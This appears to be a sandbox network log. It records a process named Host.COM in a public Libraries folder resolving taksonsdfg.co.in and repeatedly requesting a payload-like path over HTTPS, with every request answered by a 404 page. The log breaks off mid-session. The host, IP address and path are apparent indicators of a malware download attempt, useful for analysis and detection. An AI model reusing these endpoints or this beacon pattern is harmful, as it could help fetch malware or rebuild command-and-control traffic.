Oct 14, 2024 04:29:18.207295895 CEST | 192.168.2.4 | 1.1.1.1 | 0x3f6 | Standard query (0) | taksonsdfg.co.in | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 14, 2024 04:29:18.518568039 CEST | 1.1.1.1 | 192.168.2.4 | 0x3f6 | No error (0) | taksonsdfg.co.in |  | 108.170.55.202 | A (IP address) | IN (0x0001) | false

• taksonsdfg.co.in
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM

Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:19 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:19 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:29:19 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:19 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:19 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49733 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM

Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:20 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:20 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:29:20 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:20 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:20 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49735 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM

Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:21 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:21 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:29:21 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:21 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:21 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49737 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM

Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:22 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:22 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:29:22 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:22 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:22 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49739 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:23 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:23 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:29:23 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:23 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:23 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49741 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:24 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:25 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:29:25 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:25 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:25 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49743 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:26 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:26 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:29:26 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:26 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:26 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49745 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:27 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:27 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:29:27 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:27 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:27 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49747 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:28 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:28 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:29:28 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:28 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:28 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49749 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:29 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:29 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:29:29 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:29 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:29 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49751 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:30 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:30 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:29:30 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:30 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:30 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49754 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:31 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:32 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:29:31 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:32 UTC | 952 | IN
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:32 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49759 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:32 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:33 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:33 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:33 UTC | 952 | IN
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:33 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49762 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:34 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:34 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:34 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:34 UTC | 952 | IN
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:34 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49765 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:35 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:35 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:35 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:35 UTC | 952 | IN
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:35 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49767 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:36 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:36 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:36 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:36 UTC | 952 | IN
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:36 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49769 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:37 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:37 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:37 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:37 UTC | 952 | IN
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:37 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49771 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:38 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:38 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:38 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:38 UTC | 952 | IN
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:38 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49773 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:39 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:39 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
